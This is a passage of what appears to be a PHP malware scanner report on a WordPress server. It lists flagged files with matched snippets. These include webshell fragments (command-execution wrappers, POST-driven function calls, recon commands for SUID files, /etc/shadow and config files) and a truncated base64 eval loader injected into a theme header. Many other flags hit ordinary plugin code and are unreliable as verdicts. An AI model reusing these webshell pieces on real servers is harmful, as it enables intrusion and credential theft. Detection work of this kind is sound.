| Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] |
posix_getpwuid(@posix_geteuid()); $gid = @posix_getgrgid(@posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; for($j=0; $j<=$i; $j++) $cwd_links .= $path[$j].'/'; $cwd_links .= "\")'>".$path[$i]."/</a>"; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charset...
| Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] |
shell_exec($in); } elseif (is_resource($f = @popen($in,"r"))) { $▖ = ""; while(!@feof($f)) $▖ .= fread($f,1024); pclose($f); }else return "↳ Unable to execute command\n"; return ($▖==''?"↳ Query did not return anything\n":$▖); } function viewSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } funct...
| Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system($in); $▖ = ob_get_clean(); } elseif (function_exists('shell_exec')) { $▖ = shell_exec($in); } elseif (is_resource($f = @popen($in,"r"))) { $▖ = ""; while(!@feof($f)) $▖ .= fread($f,1024); pclose($f); }else return "↳ Unable to execute command\n"; return ($▖==''?"↳ Query did not return anything\n":$▖); } function viewSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($...
| Sign 00f56a27 Line: 989 Dangerous Malware Signature (hash: 00f56a27) |
$_POST['p1']($_POST['p2'])
| Sign 03ce9d9e Line: 632 Dangerous Malware Signature (hash: 03ce9d9e) |
proftpd.conf files" => "locate proftpd.conf",
"locate psybnc.conf files" => "locate psybnc.conf",
"locate my.conf files" => "locate my.conf",
"locate admin.php files" =>"locate admin.php",
"locate cfg.php files" => "locate cfg.php",
"locate conf.php files" => "locate conf.php",
"locate config.dat files" => "locate config.dat",
"locate config.php files" => "locate config.php",
"locate config.inc files" => "locate config.inc",
"locate config.inc.php" => "locate config.in...
| Sign 085a0329 Line: 603 Dangerous Malware Signature (hash: 085a0329) |
ipconfig
| Sign 0f37c730 Line: 1040 Dangerous Malware Signature (hash: 0f37c730) |
md5decrypter.com
| Sign 11413268 Line: 186 Dangerous Malware Signature (hash: 11413268) |
exploit
| Sign 11413268 Line: 232 Dangerous Malware Signature (hash: 11413268) |
Exploit
| Sign 11413268 Line: 350 Dangerous Malware Signature (hash: 11413268) |
eval($_POST
| Sign 162cf671 Line: 1034 Dangerous Malware Signature (hash: 162cf671) |
hashcrack
| Sign 19ee5b66 Line: 649 Dangerous Malware Signature (hash: 19ee5b66) |
.mysql_history
| Sign 43b0d90f Line: 989 Dangerous Malware Signature (hash: 43b0d90f) |
echo $_POST['p1']($_POST['p2']
| Sign 471b95ee Line: 1560 Dangerous Malware Signature (hash: 471b95ee) |
SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`)
| Sign 471b95ee Line: 48 Dangerous Malware Signature (hash: 471b95ee) |
Slurp", "MSNBot
| Sign 4a069524 Line: 1576 Dangerous Malware Signature (hash: 4a069524) |
aW5jbHVkZ
| Sign 4a069524 Line: 48 Dangerous Malware Signature (hash: 4a069524) |
array("Google", "Slurp"
| Sign 664602fe Line: 1039 Dangerous Malware Signature (hash: 664602fe) |
fopo.com.ar
| Sign 664602fe Line: 612 Dangerous Malware Signature (hash: 664602fe) |
find / -type f -perm -04000 -ls
| Sign 664602fe Line: 613 Dangerous Malware Signature (hash: 664602fe) |
find . -type f
| Sign 664602fe Line: 614 Dangerous Malware Signature (hash: 664602fe) |
find / -type f -perm -02000 -ls
| Sign 664602fe Line: 623 Dangerous Malware Signature (hash: 664602fe) |
find / -type f -name .htpasswd
| Sign 7186bb8d Line: 396 Dangerous Malware Signature (hash: 7186bb8d) |
rootkit
| Sign 77f25ab1 Line: 64 Dangerous Malware Signature (hash: 77f25ab1) |
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
| Sign 7830f7a6 Line: 1577 Dangerous Malware Signature (hash: 7830f7a6) |
N5c3Rlb
| Sign 7830f7a6 Line: 598 Dangerous Malware Signature (hash: 7830f7a6) |
netstat -an
| Sign 7e44169a Line: 395 Dangerous Malware Signature (hash: 7e44169a) |
$userful = array('gcc','lcc','cc','ld
| Sign 7f5d33bf Line: 1576 Dangerous Malware Signature (hash: 7f5d33bf) |
jbG9zZ
| Sign 91535293 Line: 1576 Dangerous Malware Signature (hash: 91535293) |
luY2x1ZG
| Sign 963e968a Line: 1578 Dangerous Malware Signature (hash: 963e968a) |
pbmNsdWRl
| Sign 963e968a Line: 232 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
| Sign a408f408 Line: 1576 Dangerous Malware Signature (hash: a408f408) |
c2l6ZW9m
| Sign a408f408 Line: 1631 Dangerous Malware Signature (hash: a408f408) |
call_user_func('action' . $_POST[
| Sign ae7830db Line: 1577 Dangerous Malware Signature (hash: ae7830db) |
Y2xvc2
| Sign b236d073 Line: 390 Dangerous Malware Signature (hash: b236d073) |
/etc/passwd
| Sign b236d073 Line: 391 Dangerous Malware Signature (hash: b236d073) |
/etc/shadow
| Sign d30fc49e Line: 1579 Dangerous Malware Signature (hash: d30fc49e) |
b3Blb
| Sign d97f004d Line: 1576 Dangerous Malware Signature (hash: d97f004d) |
zeXN0ZW
| Sign d97f004d Line: 1579 Dangerous Malware Signature (hash: d97f004d) |
ZGVmaW5l
| Sign de12c454 Line: 1577 Dangerous Malware Signature (hash: de12c454) |
vcGVu
| Sign ee1cb326 Line: 1577 Dangerous Malware Signature (hash: ee1cb326) |
9wZW
| Sign f9dc0a55 Line: 964 Dangerous Malware Signature (hash: f9dc0a55) |
'base64_decode'
|
|
//var/www/intimdosugsex/data/www/themes/sketch/header.php Size: 3.25 kB Created: 2021-06-06 00:59:52 Modified: 2021-06-06 00:59:52 Warns: 2 Dangers: 10
| Description | Match |
|---|
Exploit base64_long Line: 9 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'JGY9ZGlybmFtZShfX2ZpbGVfXykuJy9pbWFnZXMvd3BfbWVudV90b3AucG5nJzskYj1nZXRfb3B0aW9uKCd3cF90aGVtZV9tZW51X2ZpcnN0Jyk7aWYgKGZpbGVfZXhpc3RzKCRmKSBhbmQgISRiKXskZnAgPSBmb3BlbigkZiwiciIpOyRzID0gZnJlYWQoJGZwLGZpbGVzaXplKCRmKSk7ZmNsb3NlKCRmcCk7ZXZhbCgnJG09Jy5nenVuY29tcHJlc3Moc3RyaXBzbGFzaGVzKCRzKSkuJzsnKTskaTA9JG1bMF07JGkxPSRtWzFdOyRpMj0kbVsyXTskaTM9JG1bM107dW5zZXQoJG1bMF0sJG1bMV0sJG1bMl0pO3NodWZmbGUoJG0pOyRjc1swXT0kaTAuJGkxLiRtWzBdLiRpMi4kbVsxXS4kaTIuJG1bMl0uJGkzOyRjc1sxXT0kaTAuJGkxLiRtWzNdLiRpMi4kbVs0XS4...
| Exploit eval_base64 Line: 9 Dangerous RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine |
eval(base64_decode('JGY9ZGlybmFtZShfX2ZpbGVfXykuJy9pbWFnZXMvd3BfbWVudV90b3AucG5nJzskYj1nZXRfb3B0aW9uKCd3cF90aGVtZV9tZW51X2ZpcnN0Jyk7aWYgKGZpbGVfZXhpc3RzKCRmKSBhbmQgISRiKXskZnAgPSBmb3BlbigkZiwiciIpOyRzID0gZnJlYWQoJGZwLGZpbGVzaXplKCRmKSk7ZmNsb3NlKCRmcCk7ZXZhbCgnJG09Jy5nenVuY29tcHJlc3Moc3RyaXBzbGFzaGVzKCRzKSkuJzsnKTskaTA9JG1bMF07JGkxPSRtWzFdOyRpMj0kbVsyXTskaTM9JG1bM107dW5zZXQoJG1bMF0sJG1bMV0sJG1bMl0pO3NodWZmbGUoJG0pOyRjc1swXT0kaTAuJGkxLiRtWzBdLiRpMi4kbVsxXS4kaTIuJG1bMl0uJGkzOyRjc1sxXT0kaTAuJGkxLiRt...
| Exploit execution Line: 9 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(base64_decode('JGY9ZGlybmFtZShfX2ZpbGVfXykuJy9pbWFnZXMvd3BfbWVudV90b3AucG5nJzskYj1nZXRfb3B0aW9uKCd3cF90aGVtZV9tZW51X2ZpcnN0Jyk7aWYgKGZpbGVfZXhpc3RzKCRmKSBhbmQgISRiKXskZnAgPSBmb3BlbigkZiwiciIpOyRzID0gZnJlYWQoJGZwLGZpbGVzaXplKCRmKSk7ZmNsb3NlKCRmcCk7ZXZhbCgnJG09Jy5nenVuY29tcHJlc3Moc3RyaXBzbGFzaGVzKCRzKSkuJzsnKTskaTA9JG1bMF07JGkxPSRtWzFdOyRpMj0kbVsyXTskaTM9JG1bM107dW5zZXQoJG1bMF0sJG1bMV0sJG1bMl0pO3NodWZmbGUoJG0pOyRjc1swXT0kaTAuJGkxLiRtWzBdLiRpMi4kbVsxXS4kaTIuJG1bMl0uJGkzOyRjc1sxXT0kaTAuJGkxLiRt...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(base64_decode('JGY9ZGlybmFtZShfX2ZpbGVfXykuJy9pbWFnZXMvd3BfbWVudV90b3AucG5nJzskYj1nZXRfb3B0aW9uKCd3cF90aGVtZV9tZW51X2ZpcnN0Jyk7aWYgKGZpbGVfZXhpc3RzKCRmKSBhbmQgISRiKXskZnAgPSBmb3BlbigkZiwiciIpOyRzID0gZnJlYWQoJGZwLGZpbGVzaXplKCRmKSk7ZmNsb3NlKCRmcCk7ZXZhbCgnJG09Jy5nenVuY29tcHJlc3Moc3RyaXBzbGFzaGVzKCRzKSkuJzsnKTskaTA9JG1bMF07JGkxPSRtWzFdOyRpMj0kbVsyXTskaTM9JG1bM107dW5zZXQoJG1bMF0sJG1bMV0sJG1bMl0pO3NodWZmbGUoJG0pOyRjc1swXT0kaTAuJGkxLiRtWzBdLiRpMi4kbVsxXS4kaTIuJG1bMl0uJGkzOyRjc1sxXT0kaTAuJGkxLiRt...
| Sign 0f37c730 Line: 9 Dangerous Malware Signature (hash: 0f37c730) |
mdW5jdGlvb
| Sign 11413268 Line: 9 Dangerous Malware Signature (hash: 11413268) |
eval(base64_decode('JGY9ZGlybmFtZShfX2ZpbGVfXykuJy9pbWFnZXMvd3BfbWVudV90b3AucG5nJzskYj1nZXRfb3B0aW9uKCd3cF90aGVtZV9tZW51X2ZpcnN0Jyk7aWYgKGZpbGVfZXhpc3RzKCRmKSBhbmQgISRiKXskZnAgPSBmb3BlbigkZiwiciIpOyRzID0gZnJlYWQoJGZwLGZpbGVzaXplKCRmKSk7ZmNsb3NlKCRmcCk7ZXZhbCgnJG09Jy5nenVuY29tcHJlc3Moc3RyaXBzbGFzaGVzKCRzKSkuJzsnKTskaTA9JG1bMF07JGkxPSRtWzFdOyRpMj0kbVsyXTskaTM9JG1bM107dW5zZXQoJG1bMF0sJG1bMV0sJG1bMl0pO3NodWZmbGUoJG0pOyRjc1swXT0kaTAuJGkxLiRtWzBdLiRpMi4kbVsxXS4kaTIuJG1bMl0uJGkzOyRjc1sxXT0kaTAuJGkxLiRt...
| Sign 7830f7a6 Line: 9 Dangerous Malware Signature (hash: 7830f7a6) |
Nsb3Nl
| Sign 7f5d33bf Line: 9 Dangerous Malware Signature (hash: 7f5d33bf) |
JF9HRV
| Sign 80e70adc Line: 9 Dangerous Malware Signature (hash: 80e70adc) |
<?php eval
| Sign d30fc49e Line: 9 Dangerous Malware Signature (hash: d30fc49e) |
b3Blb
| Sign d97f004d Line: 9 Dangerous Malware Signature (hash: d97f004d) |
ZWNob
| Sign e6546205 Line: 9 Dangerous Malware Signature (hash: e6546205) |
kX0dFV
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/profile-builder-pro/add-ons/user-listing/userlisting.php Size: 136.84 kB Created: 2021-04-21 14:59:26 Modified: 2021-04-21 14:59:26 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1228 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/profile-builder-pro/assets/lib/Mustache/Engine.php Size: 22.10 kB Created: 2021-04-21 14:59:34 Modified: 2021-04-21 14:59:34 Warns: 1 Dangers: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('?>'.$this->compile($source)); } } $this->log( Mustache_Logger::DEBUG, 'Instantiating template: "{className}"', array('className' => $className) ); $this->templates[$className] = new $className($this); } return $this->templates[$className]; } private function tokenize($source) { return $this->getTokenizer()->scan($source); } private function parse($source) { return $this->getParser()->parse($this->tokenize($source)); } private function compile($source) { $tree = $this->parse($source); $name...
| Sign 11413268 Line: 602 Dangerous Malware Signature (hash: 11413268) |
eval('?>
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2019-11-21 21:41:11 Modified: 2020-07-24 20:05:47 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-05-16 20:21:31 Modified: 2021-05-16 20:21:31 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-05-16 20:21:31 Modified: 2021-05-16 20:21:31 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-05-16 20:21:31 Modified: 2021-05-16 20:21:31 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-05-16 20:21:31 Modified: 2021-05-16 20:21:31 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-05-16 20:21:31 Modified: 2021-05-16 20:21:31 Dangers: 2
| Description | Match |
|---|
Exploit execution2 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns);
}
/**
* @return bool
*/
public static function isInlineJsEnabled()
{
$isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] &&
(trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) {
return false;
}
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js
if (array_key_e...
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-05-16 20:21:31 Modified: 2021-05-16 20:21:31 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-05-16 20:21:31 Modified: 2021-05-16 20:21:31 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-05-16 20:21:31 Modified: 2021-05-16 20:21:31 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2020-02-20 14:03:34 Modified: 2020-07-24 20:05:47 Dangers: 1
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.78 kB Created: 2020-02-20 14:03:34 Modified: 2020-07-24 20:05:47 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 7576 Dangerous Hacker credits |
Hacked by
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2020-02-20 14:03:34 Modified: 2020-07-24 20:05:47 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2020-02-20 14:03:34 Modified: 2020-07-24 20:05:47 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2020-02-20 14:03:34 Modified: 2020-07-24 20:05:47 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2020-02-20 14:03:34 Modified: 2020-07-24 20:05:47 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2020-02-20 14:03:34 Modified: 2020-07-24 20:05:47 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2020-02-20 14:03:34 Modified: 2020-07-24 20:05:47 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 12 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_POST)
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2019-11-21 21:41:10 Modified: 2020-07-24 20:05:47 Dangers: 1
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2019-11-21 21:41:10 Modified: 2020-07-24 20:05:47 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2019-11-21 21:41:10 Modified: 2020-07-24 20:05:47 Dangers: 1
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2019-11-21 21:41:10 Modified: 2020-07-24 20:05:47 Dangers: 1
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2019-11-21 21:41:10 Modified: 2020-07-24 20:05:47 Warns: 3
| Description | Match |
|---|
Exploit too_many_chr Line: 1071 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2019-11-21 21:41:10 Modified: 2020-07-24 20:05:47 Dangers: 1
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2019-11-21 21:41:10 Modified: 2020-07-24 20:05:47 Dangers: 1
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2019-11-21 21:41:10 Modified: 2020-07-24 20:05:47 Dangers: 1
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2019-11-21 21:41:10 Modified: 2020-07-24 20:05:47 Dangers: 1
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2019-11-21 21:41:10 Modified: 2020-07-24 20:05:47 Dangers: 1
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2019-11-21 21:41:10 Modified: 2020-07-24 20:05:47 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2019-11-21 21:41:10 Modified: 2020-07-24 20:05:47 Dangers: 1
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2019-11-21 21:41:10 Modified: 2020-07-24 20:05:47 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 177 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/script_smartwall/update.php Size: 9.06 kB Created: 2020-09-27 15:47:32 Modified: 2020-09-27 15:47:43 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/script_smartwall/index.php Size: 38.45 kB Created: 2020-09-27 15:47:32 Modified: 2020-09-27 15:47:43 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-09-27 15:47:32 Modified: 2020-09-27 15:47:42 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
